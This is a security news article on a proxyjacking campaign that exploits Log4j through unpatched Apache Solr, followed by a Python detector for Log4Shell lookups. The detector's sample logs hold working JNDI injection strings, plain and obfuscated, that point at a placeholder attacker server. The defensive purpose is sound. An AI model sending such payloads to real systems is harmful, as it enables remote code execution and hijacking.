
New Proxyjacking Attack Exploits Log4j for Initial Access

The infamous Log4j vulnerability is back in the headlines as researchers discover a new form of attack dubbed Proxyjacking. Researchers found that attackers are exploiting the vulnerability to hijack victims' IP addresses without their authorization.

The idea of taking over IP addresses for criminal purposes is not new and has been used in different adware attacks previously.

What’s new about Proxyjacking?

Researchers at Sysdig note that the new Proxyjacking attack closely resembles cryptojacking and causes financial loss to its victims.
  • On a broader scale, researchers estimate that a modest compromise of 100 IPs can earn attackers nearly $1,000 per month.
  • It is a lucrative and easier way to monetize victims' IP addresses because Proxyjacking uses far less computing power and energy than cryptomining.

Operational details

  • The attack uses the Log4j vulnerability to gain initial access to victims' systems.
  • Instead of deploying backdoors, the attackers install an agent that turns the compromised account into a proxy server.
  • This lets them sell the device's IP address and bandwidth to a proxyware service.
  • In the case observed by Sysdig, the attackers exploited an unpatched Apache Solr service to gain control of the Kubernetes infrastructure.

Millions still at risk due to Log4j bugs

Despite the release of security patches, the Log4j vulnerability remains a significant threat across the globe. According to a report from Tenable, 72% of organizations were still vulnerable to Log4Shell as of October 2022.
Conclusion

Proxyjacking is a low-effort, high-reward attack for threat actors, which suggests it can have far-reaching implications in the wild. Currently the attack relies on a small list of proxyware services, but it is expected to grow as attackers find new ways to hijack victims' IP addresses. Meanwhile, organizations should have robust threat detection capabilities in place so they are alerted to any initial access and payload activity preceding the installation of a proxyware agent on their network.
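To make that detection advice concrete for the initial-access stage described under Operational details, here is an added example (not from Cyware or Sysdig) of a small Python detector that flags Log4Shell-style JNDI lookups in web server access logs, including the nested-lookup forms that a plain substring match for `${jndi:` misses. The log lines, addresses and Solr paths are constructed for this example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (not real traffic); 203.0.113.10 is a
# documentation-range address standing in for an attacker-controlled server.
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Jan/2023:10:01:02 +0000] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Jan/2023:10:01:07 +0000] "GET /solr/admin/cores?action=${jndi:ldap://203.0.113.10:1389/a} HTTP/1.1" 200 512 "-" "curl/7.81"',
    '10.0.0.9 - - [15/Jan/2023:10:01:09 +0000] "GET / HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${::-l}dap://203.0.113.10:1389/b}"',
    '10.0.0.7 - - [15/Jan/2023:10:02:00 +0000] "POST /solr/update HTTP/1.1" 200 20 "-" "python-requests/2.28"',
]

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")      # one innermost ${...} lookup
JNDI_LOOKUP = re.compile(r"jndi:([a-z]+):", re.I)  # resolved "jndi:<scheme>:" marker

def _resolve(inner: str) -> str:
    """Collapse one lookup the way Log4j's substitutor would, for the forms
    commonly used to split up the 'jndi' keyword (lower/upper/default-value)."""
    key, sep, value = inner.partition(":")
    if sep and key.lower() == "lower":
        return value.lower()
    if sep and key.lower() == "upper":
        return value.upper()
    if ":-" in inner:                     # ${name:-default} yields the default
        return inner.split(":-", 1)[1]
    return inner                          # unknown lookup: keep text, drop braces

def normalize(text: str, max_rounds: int = 16) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text

def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Return an alert record if the line carries a JNDI lookup, else None."""
    match = JNDI_LOOKUP.search(normalize(line))
    if not match:
        return None
    return {"src": line.split(" ", 1)[0],
            "scheme": match.group(1).lower(),
            "obfuscated": line.count("${") > 1}  # nested lookups hint at evasion

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Alerts for every line that would trigger a JNDI lookup in vulnerable Log4j."""
    return [alert for alert in map(scan_line, lines) if alert]
```

Running `scan(SAMPLE_LOGS)` yields two alerts from 10.0.0.9, the second marked as obfuscated; an alert on a host that later starts long-lived outbound connections is the kind of "initial access followed by payload activity" sequence worth correlating.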
Cyware Publisher